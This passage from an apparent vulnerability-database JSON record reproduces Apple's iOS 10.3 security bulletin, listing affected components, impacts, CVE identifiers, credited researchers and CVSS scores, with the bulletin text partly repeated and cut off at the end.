for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to unexpectedly unenforced Content Security Policy\n\nDescription: An access issue existed in Content Security Policy. This issue was addressed through improved access restrictions.\n\nCVE-2017-2419: Nicolai Gr\u00f8dum of Cisco Systems\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An information disclosure issue existed in the processing of OpenGL shaders. This issue was addressed through improved memory management.\n\nCVE-2017-2424: Paul Thomson (using the GLFuzz tool) of the Multicore Programming Group, Imperial College London\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2433: Apple\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2364: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.\n\nCVE-2017-2446: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**WebKit JavaScript Bindings**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2442: lokihardt of Google Project Zero\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Closing a window while paused in the debugger may lead to unexpected application termination\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2377: Vicki Pfau\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2405: Apple\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Yosuke HASEGAWA of Secure Sky Technology Inc. for their assistance.\n\n**Safari**\n\nWe would like to acknowledge Flyin9 (ZhenHui Lee) for their assistance.\n\n**Settings**\n\nWe would like to acknowledge Adi Sharabani and Yair Amit of Skycure for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 05, 2021\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of iOS 10.3", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3619", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2364", "CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2378", "CVE-2017-2379", "CVE-2017-2380", "CVE-2017-2384", "CVE-2017-2386", "CVE-2017-2389", "CVE-2017-2390", "CVE-2017-2393", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2397", "CVE-2017-2398", "CVE-2017-2399", "CVE-2017-2400", "CVE-2017-2401", "CVE-2017-2404", "CVE-2017-2405", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2412", "CVE-2017-2414", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2419", "CVE-2017-2423", "CVE-2017-2424", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2433", "CVE-2017-2434", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2442", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2452", "CVE-2017-2453", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2457", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2463", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2484", "CVE-2017-2485", "CVE-2017-2486", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-2491", "CVE-2017-2492", "CVE-2017-2493", "CVE-2017-5029", "CVE-2017-6976"], "modified": "2017-03-27T00:00:00", "id": "APPLE:218B65DBD8E421B171C5CC7639BE893D", "href": "https://support.apple.com/kb/HT207617", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:43:31", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iOS 10.3\n\nReleased March 27, 2017\n\n**Accounts**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A user may be able to view an Apple ID from the lock screen\n\nDescription: A prompt management issue was addressed by removing iCloud authentication prompts from the lock screen.\n\nCVE-2017-2397: Suprovici Vadim of UniApps team, an anonymous researcher\n\n**Audio**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: John Villamil, Doyensec, riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: Isaac Archambault of IDAoADI, an anonymous researcher\n\n**DataAccess**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Configuring an Exchange account with a mistyped email address may resolve to an unexpected server\n\nDescription: An input validation issue existed in the handling of Exchange email addresses. This issue was addressed through improved input validation.\n\nCVE-2017-2414: Ilya Nesterov and Maxim Goncharov\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HomeKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Home Control may unexpectedly appear on Control Center\n\nDescription: A state issue existed in the handling of Home Control. This issue was addressed through improved validation.\n\nCVE-2017-2434: Suyash Narain of India\n\n**HTTPProtocol**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**iTunes Store**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker in a privileged network position may be able to tamper with iTunes network traffic\n\nDescription: Requests to iTunes sandbox web services were sent in cleartext. This was addressed by enabling HTTPS.\n\nCVE-2017-2412: Richard Shupak (linkedin.com/in/rshupak)\n\n**JavaScriptCore**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2398: Lufeng Li of Qihoo 360 Vulcan Team\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Pasteboard**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A person with physical access to an iOS device may read the pasteboard\n\nDescription: The pasteboard was encrypted with a key protected only by the hardware UID. This issue was addressed by encrypting the pasteboard with a key protected by the hardware UID and the user's passcode.\n\nCVE-2017-2399\n\n**Phone**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A third party app can initiate a phone call without user interaction\n\nDescription: An issue existed in iOS allowing for calls without prompting. This issue was addressed by prompting a user to confirm call initiation.\n\nCVE-2017-2484\n\n**Profiles**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker may be able to exploit weaknesses in the DES cryptographic algorithm\n\nDescription: Support for the 3DES cryptographic algorithm was added to the SCEP client and DES was deprecated.\n\nCVE-2017-2380: an anonymous researcher\n\n**Quick Look**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Tapping a tel link in a PDF document could trigger a call without prompting the user\n\nDescription: An issue existed when checking the tel URL before initiating calls. This issue was addressed with the addition of a confirmation prompt.\n\nCVE-2017-2404: Tuan Anh Ngo (Melbourne, Australia), Christoph Nehring\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A state management issue was addressed by disabling text input until the destination page loads.\n\nCVE-2017-2376: an anonymous researcher, Michal Zalewski of Google Inc, Muneaki Nishimura (nishimunea) of Recruit Technologies Co., Ltd., Chris Hlady of Google Inc, an anonymous researcher, Yuyang Zhou of Tencent Security Platform Department (security.tencent.com)\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A local user may be able to discover websites a user has visited in Private Browsing\n\nDescription: An issue existed in SQLite deletion. This issue was addressed through improved SQLite cleanup.\n\nCVE-2017-2384\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may present authentication sheets over arbitrary web sites\n\nDescription: A spoofing and denial-of-service issue existed in the handling of HTTP authentication. This issue was addressed through making HTTP authentication sheets non-modal.\n\nCVE-2017-2389: ShenYeYinJiu of Tencent Security Response Center, TSRC\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website by clicking a link may lead to user interface spoofing\n\nDescription: A spoofing issue existed in the handling of FaceTime prompts. This issue was addressed through improved input validation.\n\nCVE-2017-2453: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**Safari Reader**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Enabling the Safari Reader feature on a maliciously crafted webpage may lead to universal cross site scripting\n\nDescription: Multiple validation issues were addressed through improved input sanitization.\n\nCVE-2017-2393: Erling Ellingsen\n\n**SafariViewController**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Cache state is not properly kept in sync between Safari and SafariViewController when a user clears Safari cache\n\nDescription: An issue existed in clearing Safari cache information from SafariViewController. This issue was addressed by improving cache state handling.\n\nCVE-2017-2400: Abhinav Bansal of Zscaler, Inc.\n\n**Sandbox Profiles**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to access the iCloud user record of a signed in user\n\nDescription: An access issue was addressed through additional sandbox restrictions on third party applications.\n\nCVE-2017-6976: George Dan (@theninjaprawn)\n\nEntry added August 1, 2017\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Validating empty signatures with SecKeyRawVerify() may unexpectedly succeed\n\nDescription: An validation issue existed with cryptographic API calls. This issue was addressed through improved parameter validation.\n\nCVE-2017-2423: an anonymous researcher\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**Siri**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Siri might reveal text message contents while the device is locked\n\nDescription: An insufficient locking issue was addressed with improved state management.\n\nCVE-2017-2452: Hunter Byrnes\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Dragging and dropping a maliciously crafted link may lead to bookmark spoofing or arbitrary code execution\n\nDescription: A validation issue existed in bookmark creation. This issue was addressed through improved input validation.\n\nCVE-2017-2378: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-2486: redrain of light4freedom\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative\n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2457: lokihardt of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: Jeonghoon Shin, Natalie Silvanovich of Google Project Zero\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to unexpectedly unenforced Content Security Policy\n\nDescription: An access issue existed in Content Security Policy. This issue was addressed through improved access restrictions.\n\nCVE-2017-2419: Nicolai Gr\u00f8dum of Cisco Systems\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An information disclosure issue existed in the processing of OpenGL shaders. This issue was addressed through improved memory management.\n\nCVE-2017-2424: Paul Thomson (using the GLFuzz tool) of the Multicore Programming Group, Imperial College London\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2433: Apple\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved 